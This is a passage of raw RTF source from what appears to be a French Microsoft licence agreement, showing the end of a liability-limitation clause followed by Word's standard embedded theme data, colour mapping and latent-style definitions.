\\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Cette limitation concerne\\~: \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}}\\pard\\plain \\ltrpar \\s25\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\nowidctlpar\\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin720\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 toute affaire li\\'e9\\loch\\f39 e au logiciel, aux services ou au contenu (y compris le code) figurant sur des sites Internet tiers ou dans des programmes tiers et \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 les r\\'e9\\loch\\f39 \\hich\\f39 clamations au titre de violation de contrat ou de garantie, ou au titre de responsabilit\\'e9\\loch\\f39 stricte,\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 de n\\'e9\\loch\\f39 gligence ou d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 une autre faute dans la limite autoris\\'e9\\loch\\f39 e par la loi en vigueur. \\par }\\pard\\plain \\ltrpar\\ql \\li360\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin360\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Elle s\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 applique \\'e9\\loch\\f39 \\hich\\f39 galement m\\'ea\\loch\\f39 \\hich\\f39 me si Microsoft connaissait l'\\'e9\\loch\\f39 \\hich\\f39 ventualit\\'e9\\loch\\f39 \\hich\\f39 d'un tel dommage. La limitation ou exclusion ci-dessus peut \\'e9\\loch\\f39 \\hich\\f39 galement ne pas vous \\'ea\\loch\\f39 tre applicable, car\\hich\\af39\\dbch\\af13\\loch\\f39 votre pays n\\hich\\f39 \\rquote \\loch\\f39 autorise pas l\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 exclusion ou la limitation de responsabilit\\'e9\\loch\\f39 pour les dommages indirects, accessoires ou de quelque nature que ce soit. \\par }\\pard \\ltrpar\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid211147 \\par }{\\\*\\themedata 504b030414000600080000002100e9de0fbfff0000001c020000130000005b436f6e74656e745f54797065735d2e786d6cac91cb4ec3301045f748fc83e52d4a 9cb2400825e982c78ec7a27cc0c8992416c9d8b2a755fbf74cd25442a820166c2cd933f79e3be372bd1f07b5c3989ca74aaff2422b24eb1b475da5df374fd9ad 5689811a183c61a50f98f4babebc2837878049899a52a57be670674cb23d8e90721f90a4d2fa3802cb35762680fd800ecd7551dc18eb899138e3c943d7e503b6 b01d583deee5f99824e290b4ba3f364eac4a430883b3c092d4eca8f946c916422ecab927f52ea42b89a1cd59c254f919b0e85e6535d135a8de20f20b8c12c3b0 0c895fcf6720192de6bf3b9e89ecdbd6596cbcdd8eb28e7c365ecc4ec1ff1460f53fe813d3cc7f5b7f020000ffff0300504b030414000600080000002100a5d6 a7e7c0000000360100000b0000005f72656c732f2e72656c73848fcf6ac3300c87ef85bd83d17d51d2c31825762fa590432fa37d00e1287f68221bdb1bebdb4f c7060abb0884a4eff7a93dfeae8bf9e194e720169aaa06c3e2433fcb68e1763dbf7f82c985a4a725085b787086a37bdbb55fbc50d1a33ccd311ba548b6309512 0f88d94fbc52ae4264d1c910d24a45db3462247fa791715fd71f989e19e0364cd3f51652d73760ae8fa8c9ffb3c330cc9e4fc17faf2ce545046e37944c69e462 a1a82fe353bd90a865aad41ed0b5b8f9d6fd010000ffff0300504b0304140006000800000021006b799616830000008a0000001c0000007468656d652f746865 6d652f7468656d654d616e616765722e786d6c0ccc4d0ac3201040e17da17790d93763bb284562b2cbaebbf600439c1a41c7a0d29fdbd7e5e38337cedf14d59b 4b0d592c9c070d8a65cd2e88b7f07c2ca71ba8da481cc52c6ce1c715e6e97818c9b48d13df49c873517d23d59085adb5dd20d6b52bd521ef2cdd5eb9246a3d8b 4757e8d3f729e245eb2b260a0238fd010000ffff0300504b030414000600080000002100aa5225dfc60600008b1a0000160000007468656d652f7468656d652f 7468656d65312e786d6cec595d8bdb46147d2ff43f08bd3bfe92fcb1c41b6cd9ceb6d94d42eca4e4716c8fadc98e344633de8d0981923c160aa569e943037deb 43691b48a02fe9afd936a54d217fa17746b63c638fbb9b2585a5640d8b343af7ce997bafce1d4997afdc8fa87384134e58dc708b970aae83e3211b9178d2706f f7bbb99aeb7081e211a22cc60d778eb97b65f7c30f2ea31d11e2083b601ff31dd4704321a63bf93c1fc230e297d814c7706dcc920809384d26f951828ec16f44 f3a542a1928f10895d274611b8bd311e932176fad2a5bbbb74dea1701a0b2e078634e949d7d8b050d8d1615122f89c0734718e106db830cf881df7f17de13a14 7101171a6e41fdb9f9ddcb79b4b330a2628bad66d7557f0bbb85c1e8b0a4e64c26836c52cff3bd4a33f3af00546ce23ad54ea553c9fc29001a0e61a52917dda7 dfaab7dafe02ab81d2438bef76b55d2e1a78cd7f798373d3973f03af40a97f6f03dfed06104503af4029dedfc07b5eb51478065e81527c65035f2d34db5ed5c0 2b5048497cb8812ef89572b05c6d061933ba6785d77daf5b2d2d9caf50500d5975c929c62c16db6a2d42f758d2058004522448ec88f9148fd110aa3840940c12 e2ec93490885374531e3305c2815ba8532fc973f4f1da988a01d8c346bc90b98f08d21c9c7e1c3844c45c3fd18bcba1ae4cdcb1fdfbc7cee9c3c7a71f2e89793 c78f4f1efd9c3a32acf6503cd1ad5e7fffc5df4f3f75fe7afeddeb275fd9f15cc7fffed367bffdfaa51d082b5d85e0d5d7cffe78f1ecd5379ffff9c3130bbc99 a0810eef930873e73a3e766eb10816a6426032c783e4ed2cfa2122ba45339e701423398bc57f478406fafa1c5164c1b5b019c13b09488c0d787576cf20dc0b93 9920168fd7c2c8001e30465b2cb146e19a9c4b0b737f164fec9327331d770ba123dbdc018a8dfc766653d05662731984d8a07993a258a0098eb170e4357688b1 6575770931e27a408609e36c2c9cbbc46921620d499f0c8c6a5a19ed9108f232b711847c1bb139b8e3b418b5adba8d8f4c24dc15885ac8f73135c27815cd048a 6c2efb28a27ac0f791086d247bf364a8e33a5c40a6279832a733c29cdb6c6e24b05e2de9d7405eec693fa0f3c84426821cda7cee23c674649b1d06218aa6366c 8fc4a18efd881f428922e7261336f80133ef10790e7940f1d674df21d848f7e96a701b9455a7b42a107965965872791533a37e7b733a4658490d08bfa1e71189 4f15f73559f7ff5b5907217df5ed53cbaa2eaaa0371362bda3f6d6647c1b6e5dbc03968cc8c5d7ee369ac53731dc2e9b0decbd74bf976ef77f2fdddbeee7772f d82b8d06f9965bc574abae36eed1d67dfb9850da13738af7b9daba73e84ca32e0c4a3bf5cc8ab3e7b8690887f24e86090cdc2441cac64998f88488b017a229ec ef8bae7432e10bd713ee4c19876dbf1ab6fa96783a8b0ed8287d5c2d16e5a3692a1e1c89d578c1cfc6e15143a4e84a75f50896b9576c27ea51794940dabe0d09 6d329344d942a2ba1c9441520fe610340b09b5b277c2a26e615193ee97a9da6001d4b2acc0d6c9810d57c3f53d30012378a242148f649ed2542fb3ab92f92e33 bd2d984605c03e625901ab4cd725d7adcb93ab4b4bed0c99364868e566925091513d8c87688417d52947cf42e36d735d5fa5d4a02743a1e683d25ad1a8d6fe8d c579730d76ebda40635d2968ec1c37dc4ad9879219a269c31dc3633f1c4653a81d2eb7bc884ee0ddd95024e90d7f1e6599265cb4110fd3802bd149d520220227 0e2551c395cbcfd24063a5218a5bb104827061c9d541562e1a3948ba99643c1ee3a1d0d3ae8dc848a7a7a0f0a95658af2af3f383a5259b41ba7be1e8d819d059 720b4189f9d5a20ce0887078fb534ca33922f03a3313b255fdad35a685eceaef13550da5e3884e43b4e828ba98a77025e5191d7596c5403b5bac1902aa8564d1 080713d960f5a01add34eb1a2987ad5df7742319394d34573dd35015d935ed2a66ccb06c036bb13c5f93d7582d430c9aa677f854bad725b7bed4bab57d42d625 20e059fc2c5df70c0d41a3b69acca026196fcab0d4ecc5a8d93b960b3c85da599a84a6fa95a5dbb5b8653dc23a1d0c9eabf383dd7ad5c2d078b9af549156df3d f44f136c700fc4a30d2f81675470954af8f09020d810f5d49e24950db845ee8bc5ad0147ce2c210df741c16f7a41c90f72859adfc97965af90abf9cd72aee9fb e562c72f16daadd243682c228c8a7efacda50bafa2e87cf1e5458d6f7c7d89966fdb2e0d599467eaeb4a5e11575f5f8aa5ed5f5f1c02a2f3a052ead6cbf55625 572f37bb39afddaae5ea41a5956b57826abbdb0efc5abdfbd0758e14d86b9603afd2a9e52ac520c8799582a45fabe7aa5ea9d4f4aacd5ac76b3e5c6c6360e5a9 7c2c6201e155bc76ff010000ffff0300504b0304140006000800000021000dd1909fb60000001b010000270000007468656d652f7468656d652f5f72656c732f 7468656d654d616e616765722e786d6c2e72656c73848f4d0ac2301484f78277086f6fd3ba109126dd88d0add40384e4350d363f2451eced0dae2c082e8761be 9969bb979dc9136332de3168aa1a083ae995719ac16db8ec8e4052164e89d93b64b060828e6f37ed1567914b284d262452282e3198720e274a939cd08a54f980 ae38a38f56e422a3a641c8bbd048f7757da0f19b017cc524bd62107bd5001996509affb3fd381a89672f1f165dfe514173d9850528a2c6cce0239baa4c04ca5b babac4df000000ffff0300504b01022d0014000600080000002100e9de0fbfff0000001c0200001300000000000000000000000000000000005b436f6e74656e 745f54797065735d2e786d6c504b01022d0014000600080000002100a5d6a7e7c0000000360100000b00000000000000000000000000300100005f72656c732f 2e72656c73504b01022d00140006000800000021006b799616830000008a0000001c00000000000000000000000000190200007468656d652f7468656d652f74 68656d654d616e616765722e786d6c504b01022d0014000600080000002100aa5225dfc60600008b1a00001600000000000000000000000000d6020000746865 6d652f7468656d652f7468656d65312e786d6c504b01022d00140006000800000021000dd1909fb60000001b0100002700000000000000000000000000d00900007468656d652f7468656d652f5f72656c732f7468656d654d616e616765722e786d6c2e72656c73504b050600000000050005005d010000cb0a00000000} {\\\*\\colorschememapping 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d3822207374616e64616c6f6e653d22796573223f3e0d0a3c613a636c724d 617020786d6c6e733a613d22687474703a2f2f736368656d61732e6f70656e786d6c666f726d6174732e6f72672f64726177696e676d6c2f323030362f6d6169 6e22206267313d226c743122207478313d22646b3122206267323d226c743222207478323d22646b322220616363656e74313d22616363656e74312220616363 656e74323d22616363656e74322220616363656e74333d22616363656e74332220616363656e74343d22616363656e74342220616363656e74353d22616363656e74352220616363656e74363d22616363656e74362220686c696e6b3d22686c696e6b2220666f6c486c696e6b3d22666f6c486c696e6b222f3e} {\\\*\\latentstyles\\lsdstimax371\\lsdlockeddef0\\lsdsemihiddendef0\\lsdunhideuseddef0\\lsdqformatdef0\\lsdprioritydef99{\\lsdlockedexcept \\lsdqformat1 \\lsdpriority0 \\lsdlocked0 Normal;\\lsdqformat1 \\lsdlocked0 heading 1; \\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 4; \\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 5;\\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 6;\\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 7; \\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 8;\\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdlocked0 heading 9;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 1;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 2; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 4;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 5;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 6; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 7;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 8;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index 9;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 1; \\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 4; \\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 5;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 6;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 7; \\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 8;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority39 \\lsdlocked0 toc 9;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Normal Indent;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 footnote text; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 annotation text;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 header;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 footer;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 index heading; \\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdpriority35 \\lsdlocked0 caption;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 table of figures;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 envelope address; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 envelope return;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 footnote reference;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 annotation reference;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 line number; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 page number;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 endnote reference;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 endnote text;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 table of authorities; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 macro;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 toa heading;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Bullet; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Number;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List 4; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List 5;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Bullet 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Bullet 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Bullet 4; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Bullet 5;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Number 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Number 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Number 4; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Number 5;\\lsdqformat1 \\lsdpriority10 \\lsdlocked0 Title;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Closing;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Signature; \\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority1 \\lsdlocked0 Default Paragraph Font;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text Indent;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Continue; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Continue 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Continue 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Continue 4;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 List Continue 5; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Message Header;\\lsdqformat1 \\lsdpriority11 \\lsdlocked0 Subtitle;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Salutation;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Date; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text First Indent;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text First Indent 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Note Heading;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text 2; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text Indent 2;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Body Text Indent 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Block Text; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Hyperlink;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 FollowedHyperlink;\\lsdqformat1 \\lsdpriority22 \\lsdlocked0 Strong;\\lsdqformat1 \\lsdpriority20 \\lsdlocked0 Emphasis; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Document Map;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Plain Text;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 E-mail Signature;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Top of Form; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Bottom of Form;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Normal (Web);\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Acronym;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Address; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Cite;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Code;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Definition;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Keyboard; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Preformatted;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Sample;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Typewriter;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 HTML Variable; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 annotation subject;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 No List;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Outline List 1;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Outline List 2; \\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Outline List 3;\\lsdsemihidden1 \\lsdunhideused1 \\lsdlocked0 Balloon Text;\\lsdpriority39 \\lsdlocked0 Table Grid;\\lsdsemihidden1 \\lsdlocked0 Placeholder Text;\\lsdqformat1 \\lsdpriority1 \\lsdlocked0 No Spacing; \\lsdpriority60 \\lsdlocked0 Light Shading;\\lsdpriority61 \\lsdlocked0 Light List;\\lsdpriority62 \\lsdlocked0 Light Grid;\\lsdpriority63 \\lsdlocked0 Medium Shading 1;\\lsdpriority64 \\lsdlocked0 Medium Shading 2;\\lsdpriority65 \\lsdlocked0 Medium List 1; \\lsdpriority66 \\lsdlocked0 Medium List 2;\\lsdpriority67 \\lsdlocked0 Medium Grid 1;\\lsdpriority68 \\lsdlocked0 Medium Grid 2;\\lsdpriority69 \\lsdlocked0 Medium Grid 3;\\lsdpriority70 \\lsdlocked0 Dark List;\\lsdpriority71 \\lsdlocked0 Colorful Shading; \\lsdpriority72 \\lsdlocked0 Colorful List;\\lsdpriority73 \\lsdlocked0 Colorful Grid;\\lsdpriority60 \\lsdlocked0 Light Shading Accent 1;\\lsdpriority61 \\lsdlocked0 Light List Accent 1;\\lsdpriority62 \\lsdlocked0 Light Grid Accent 1; \\lsdpriority63 \\lsdlocked0 Medium Shading 1 Accent 1;\\lsdpriority64 \\lsdlocked0 Medium Shading 2 Accent 1;\\lsdpriority65 \\lsdlocked0 Medium List 1 Accent 1;\\lsdsemihidden1 \\lsdlocked0 Revision;\\lsdqformat1 \\lsdpriority34 \\lsdlocked0 List Paragraph; \\lsdqformat1 \\lsdpriority29 \\lsdlocked0 Quote;\\lsdqformat1 \\lsdpriority30 \\lsdlocked0 Intense Quote;\\lsdpriority66 \\lsdlocked0 Medium List 2 Accent 1;\\lsdpriority67 \\lsdlocked0 Medium Grid 1 Accent 1;\\lsdpriority68 \\lsdlocked0 Medium Grid 2 Accent 1; \\lsdpriority69 \\lsdlocked0 Medium Grid 3 Accent 1;\\lsdpriority70 \\lsdlocked0 Dark List Accent 1;\\lsdpriority71 \\lsdlocked0 Colorful Shading Accent 1;\\lsdpriority72 \\lsdlocked0 Colorful List Accent 1;\\lsdpriority73 \\lsdlocked0 Colorful Grid Accent 1; \\lsdpriority60 \\lsdlocked0 Light Shading Accent 2;\\lsdpriority61 \\lsdlocked0 Light List Accent 2;\\lsdpriority62 \\lsdlocked0 Light Grid Accent 2;\\lsdpriority63 \\lsdlocked0 Medium Shading 1 Accent 2;\\lsdpriority64 \\lsdlocked0 Medium Shading 2 Accent 2; \\lsdpriority65 \\lsdlocked0 Medium List 1 Accent 2;\\lsdpriority66 \\lsdlocked0 Medium List 2 Accent 2;\\lsdpriority67 \\lsdlocked0 Medium Grid 1 Accent 2;\\lsdpriority68 \\lsdlocked0 Medium Grid 2 Accent 2;\\lsdpriority69 \\lsdlocked0 Medium Grid 3 Accent 2; \\lsdpriority70 \\lsdlocked0 Dark List Accent 2;\\lsdpriority71 \\lsdlocked0 Colorful Shading Accent 2;\\lsdpriority72 \\lsdlocked0 Colorful List Accent 2;\\lsdpriority73 \\lsdlocked0 Colorful Grid Accent 2;\\lsdpriority60 \\lsdlocked0 Light Shading Accent 3; \\lsdpriority61 \\lsdlocked0 Light List Accent 3;\\lsdpriority62 \\lsdlocked0 Light Grid Accent 3;\\lsdpriority63 \\lsdlocked0 Medium Shading 1 Accent 3;\\lsdpriority64 \\lsdlocked0 Medium Shading 2 Accent 3;\\lsdpriority65 \\lsdlocked0 Medium List 1 Accent 3; \\lsdpriority66 \\lsdlocked0 Medium List 2 Accent 3;\\lsdpriority67 \\lsdlocked0 Medium Grid 1 Accent 3;\\lsdpriority68 \\lsdlocked0 Medium Grid 2 Accent 3;\\lsdpriority69 \\lsdlocked0 Medium Grid 3 Accent 3;\\lsdpriority70 \\lsdlocked0 Dark List Accent 3; \\lsdpriority71 \\lsdlocked0 Colorful Shading Accent 3;\\lsdpriority72 \\lsdlocked0 Colorful List Accent 3;\\lsdpriority73 \\lsdlocked0 Colorful Grid Accent 3;\\lsdpriority60 \\lsdlocked0 Light Shading Accent 4;\\lsdpriority61 \\lsdlocked0 Light List Accent 4; \\lsdpriority62 \\lsdlocked0 Light Grid Accent 4;\\lsdpriority63 \\lsdlocked0 Medium Shading 1 Accent 4;\\lsdpriority64 \\lsdlocked0 Medium Shading 2 Accent 4;\\lsdpriority65 \\lsdlocked0 Medium List 1 Accent 4;\\lsdpriority66 \\lsdlocked0 Medium List 2 Accent 4; \\lsdpriority67 \\lsdlocked0 Medium Grid 1 Accent 4;\\lsdpriority68 \\lsdlocked0 Medium Grid 2 Accent 4;\\lsdpriority69 \\lsdlocked0 Medium Grid 3 Accent 4;\\lsdpriority70 \\lsdlocked0 Dark List Accent 4;\\lsdpriority71 \\lsdlocked0 Colorful Shading Accent 4; \\lsdpriority72 \\lsdlocked0 Colorful List Accent 4;\\lsdpriority73 \\lsdlocked0 Colorful Grid Accent 4;\\lsdpriority60 \\lsdlocked0 Light Shading Accent 5;\\lsdpriority61 \\lsdlocked0 Light List Accent 5;\\lsdpriority62 \\lsdlocked0 Light Grid Accent 5; \\lsdpriority63 \\lsdlocked0 Medium Shading 1 Accent 5;\\lsdpriority64 \\lsdlocked0 Medium Shading 2 Accent 5;\\lsdpriority65 \\lsdlocked0 Medium List 1 Accent 5;\\lsdpriority66 \\lsdlocked0 Medium List 2 Accent 5; \\lsdpriority67 \\lsdlocked0 Medium Grid 1 Accent 5;\\lsdpriority68 \\lsdlocked0 Medium Grid 2 Accent 5;\\lsdpriority69 \\lsdlocked0 Medium Grid 3 Accent 5;\\lsdpriority70 \\lsdlocked0 Dark List Accent 5;\\lsdpriority71 \\lsdlocked0 Colorful Shading Accent 5; \\lsdpriority72 \\lsdlocked0 Colorful List Accent 5;\\lsdpriority73 \\lsdlocked0 Colorful Grid Accent 5;\\lsdpriority60 \\lsdlocked0 Light Shading Accent 6;\\lsdpriority61 \\lsdlocked0 Light List Accent 6;\\lsdpriority62 \\lsdlocked0 Light Grid Accent 6; \\lsdpriority63 \\lsdlocked0 Medium Shading 1 Accent 6;\\lsdpriority64 \\lsdlocked0 Medium Shading 2 Accent 6;\\lsdpriority65 \\lsdlocked0 Medium List 1 Accent 6;\\lsdpriority66 \\lsdlocked0 Medium List 2 Accent 6; \\lsdpriority67 \\lsdlocked0 Medium Grid 1 Accent 6;\\lsdpriority68 \\lsdlocked0 Medium Grid 2 Accent 6;\\lsdpriority69 \\lsdlocked0 Medium Grid 3 Accent 6;\\lsdpriority70 \\lsdlocked0 Dark List Accent 6;\\lsdpriority71 \\lsdlocked0 Colorful Shading Accent 6; \\lsdpriority72 \\lsdlocked0 Colorful List Accent 6;\\lsdpriority73 \\lsdlocked0 Colorful Grid Accent 6;\\lsdqformat1 \\lsdpriority19 \\lsdlocked0 Subtle Emphasis;\\lsdqformat1 \\lsdpriority21 \\lsdlocked0 Intense Emphasis; \\lsdqformat1 \\lsdpriority31 \\lsdlocked0 Subtle Reference;\\lsdqformat1 \\lsdpriority32 \\lsdlocked0 Intense Reference;\\lsdqformat1 \\lsdpriority33 \\lsdlocked0 Book Title;\\lsdsemihidden1 \\lsdunhideused1 \\lsdpriority37 \\lsdlocked0 Bibliography; \\lsdsemihidden1 \\lsdunhideused1 \\lsdqformat1 \\lsdpriority39 \\lsdlocked0 TOC Heading;\\lsdpriority41 \\lsdlocked0 Plain Table 1;\\lsdpriority42 \\lsdlocked0 Plain Table 2;\\lsdpriority43 \\lsdlocked0 Plain Table 3;\\lsdpriority44 \\lsdlocked0 Plain Table 4; \\lsdpriority45 \\lsdlocked0 Plain Table 5;\\lsdpriority40 \\lsdlocked0 Grid Table Light;\\lsdpriority46 \\lsdlocked0 Grid Table 1 Light;\\lsdpriority47 \\lsdlocked0 Grid Table 2;\\lsdpriority48 \\lsdlocked0 Grid Table 3;\\lsdpriority49 \\lsdlocked0 Grid Table 4; \\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark;\\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful;\\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful;\\lsdpriority46 \\lsdlocked0 Grid Table 1 Light Accent 1;\\lsdpriority47 \\lsdlocked0 Grid Table 2 Accent 1; \\lsdpriority48 \\lsdlocked0 Grid Table 3 Accent 1;\\lsdpriority49 \\lsdlocked0 Grid Table 4 Accent 